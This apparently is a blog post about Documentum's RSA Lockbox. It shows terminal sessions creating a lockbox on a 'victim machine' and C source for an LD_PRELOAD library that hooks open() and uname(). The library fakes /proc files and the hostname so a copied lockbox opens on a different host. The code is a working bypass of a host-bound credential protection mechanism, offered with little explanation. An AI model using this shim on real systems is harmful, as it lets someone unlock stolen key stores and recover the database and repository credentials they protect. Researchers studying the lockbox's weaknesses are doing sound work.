RSA Lockbox magic :)

As was promised previously

Preparing RSA Lockbox on victim machine:

[dmadmin@docu72cs dba]$ dm_crypto_create -lockbox lockbox.lb \
> -lockboxpassphrase WSX@234edc \
> -keyname CSaek -passphrase QAZ123wsx

** Will use default algorithm **

Please wait. This will take a few seconds ...
** Successfully created key store 
     /u01/documentum/dba/secure/CSaek using algorithm AES_128_CBC
Key - CSaek uses algorithm AES_128_CBC.

Lockbox: Created /u01/documentum/dba/secure/lockbox.lb.
Created key CSaek


[dmadmin@docu72cs dba]$ ipcs

------ Shared Memory Segments --------
key        shmid      owner      perms      bytes      nattch     status
0x000005d1 807206912  dmadmin    640        1024       0

------ Semaphore Arrays --------
key        semid      owner      perms      nsems

------ Message Queues --------
key        msqid      owner      perms      used-bytes   messages



[dmadmin@docu72cs dba]$ dm_encrypt_password -lockbox lockbox.lb \
> -passphrase QAZ123wsx -keyname CSaek \
> -docbase D72 -rdbms -encrypt d72

** Successfully encrypted password in dbpasswd.txt file

[dmadmin@docu72cs dba]$ ./dm_start_D72
starting Documentum server for repository: [D72]
with server log: [/u01/documentum/dba/log/D72.log]
server pid: 4421

[dmadmin@docu72cs dba]$ head /u01/documentum/dba/log/D72.log
.... [DM_SERVER_I_START_SERVER]info:  "Docbase D72 attempting to open"

.... [DM_SERVER_I_START_KEY_STORAGE_MODE]info:  
         "Docbase D72 is using database for cryptographic key storage"

Opening RSA Lockbox on another machine:

Related source code:

#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/utsname.h> 

static int (*orig_open)(char *, int) = NULL;
static int (*orig_uname) (struct utsname * buf);


int open(char * filename, int flags) {
 if (orig_open == NULL)
  orig_open = dlsym(RTLD_NEXT, "open");

 if (strcmp(filename, "/proc/version") != 0 
  && strcmp(filename, "/proc/swaps") != 0
  && strcmp(filename, "/proc/cpuinfo") != 0 
  && strcmp(filename, "/proc/partitions") != 0) {
  return orig_open(filename, flags);
 }
    
 char * home = getenv("PROC_PATH");

 if (!home) {
  return orig_open(filename, flags);
 }

 size_t newfilename_len = strlen(filename) + strlen(home) + 1;
 char * newfilename = (char*) malloc(newfilename_len);
 memset(newfilename, 0, sizeof(newfilename));
 strncat(newfilename, home, strlen(home));
 strncat(newfilename, filename, strlen(filename));
 int ret = orig_open(newfilename, flags);
 free(newfilename);
 return ret;
}

int uname(struct utsname *buf) {
 if (orig_uname == NULL)
  orig_uname = dlsym(RTLD_NEXT, "uname");

 int ret = orig_uname(buf);
 char * fakename = getenv("FAKENAME");

 if(!fakename) {
  return ret;
 }
 memset(buf->nodename, 0, sizeof(buf->nodename));
 strncpy(buf->nodename, fakename, sizeof(buf->nodename) - 1); 
 return ret;
}

4 thoughts on “RSA Lockbox magic :)

  1. Pingback: Encryption madness | Documentum in a (nuts)HELL
  2. Pingback: Weird release management | Documentum in a (nuts)HELL
  3. Pingback: Say goodbuy LockBox | Documentum in a (nuts)HELL
  4. Pingback: Say goodbuy LockBox. Part II | Documentum in a (nuts)HELL

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s